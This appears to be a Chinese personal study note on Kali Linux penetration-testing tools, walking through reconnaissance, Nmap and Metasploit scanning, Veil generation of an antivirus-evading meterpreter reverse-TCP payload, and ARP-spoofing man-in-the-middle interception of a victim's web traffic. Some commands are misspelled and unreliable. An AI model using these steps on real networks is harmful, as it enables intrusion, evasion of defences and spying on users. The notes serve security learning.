大学霸kali linux命令学习笔记

自己做下学习笔记，2017的年过的真心无聊，记录一下

第一、二章为安装篇自行阅读

第三章 信息收集

3.1 recon-ng 自动收集信息和网络侦察 命令行 recon-ng

eg1 枚举baidu.com子域名

命令行 

recon-ng

use recon/domains-hosts/baidu_site

show options

set SOURCE baidu.com

run

查看保存的数据

命令行 

recon-ng

use reporting/csv

run

eg2 枚举子域名 dmitry命令

命令行

dmity -s baidu.com

3.2 arp侦察工具-Netdiscover

eg扫描局域网中的所有主机

命令行

netdiscover

3.3 Zenmap端口扫描器，是图像界面的Nmap

命令行zenmap

启动后在Target输入192.168.1.1/255 点击scan 就扫描1-255主机

3.4 黑暗搜索引擎 shodanhq.com

第四章攻击主机

4.1 Nmap网络扫描和嗅探工具​ 

sqlmap是sql injection用的不要混为一谈，用图像界面的zenmap更好

​eg命令行

nmap -sS -Pn -A 192.168.1.1​

​-sS表示使用TCP SYN扫描，速度非常快 -Pn表示不进行ping扫描 -A表示查看目标主机的所有启动服务

4.2 在Metasploit中扫描

​启动命令行

msfconsole

搜索可用的扫描模块​

命令行

search scanner​

扫描ssh服务的扫描模块

search scanner/ssh

试用ssh_version模块扫描SSH服务

命令行 

use auxiliary/scanner/ssh/ssh_version

查看ssh_verison模块下参数

命令行

show options

配置RHOSTS选项

命令行

set RHOSTS 192.168.1.1

启动扫描

命令行

exploit​

4.3 免杀Payload生成工具 Veil​

Veil是一款利用Metasploit框架生成相兼容的payload免杀工具，kali没有默认安装

安装命令

sudo apt-get instal veil​

启动命令行

veil-evasion

选择cs/meterpreter/rev_tcp攻击载荷 编号5

命令行

use 5

设置LHOST选项参数 查看info

命令行

set LHOST 192.168.1.1

info

使用generate 命令生成载荷文件

命令行

generate

​然后生成一个 output files的文件名，比如znrr 生成的znrr.exe放到目标主机上，就可以利用该文件攻击载荷了

​4.4 提升权限

4.5 捕获和监视网络数据

中间人攻击 Man in the Middle Attack 简称MITM​

通过Arpspoof攻击，开启路由器转发功能命令行

echo 1>/proc/sys/net/ipv4/ip_forward

arpspoof -i eth0 -t 192.168.1.103 192.168.1.1​

查看目标主机访问url地址 命令行​

​urlscarf -i eth0

查看被害人访问图片

driftnet -i eth0​

4.6 在metasploit中捕获包

​可以使用wireshark

4.7 pcap文件解析工具 Xplico

Xplico是一个从pcap文件中解析出ip流量数据的工具，可解析邮箱、http、VoIP calls、FTP等，kali没默认安装需要命令行 sudo apt-get install xplico​​，由于是web程序，需要开启apache

4.8 浏览器渗透攻击框架 BeEF​

​BeEF Browser Exploitation Framework 是一款浏览器漏洞利用框架，同样是web程序需要开启apache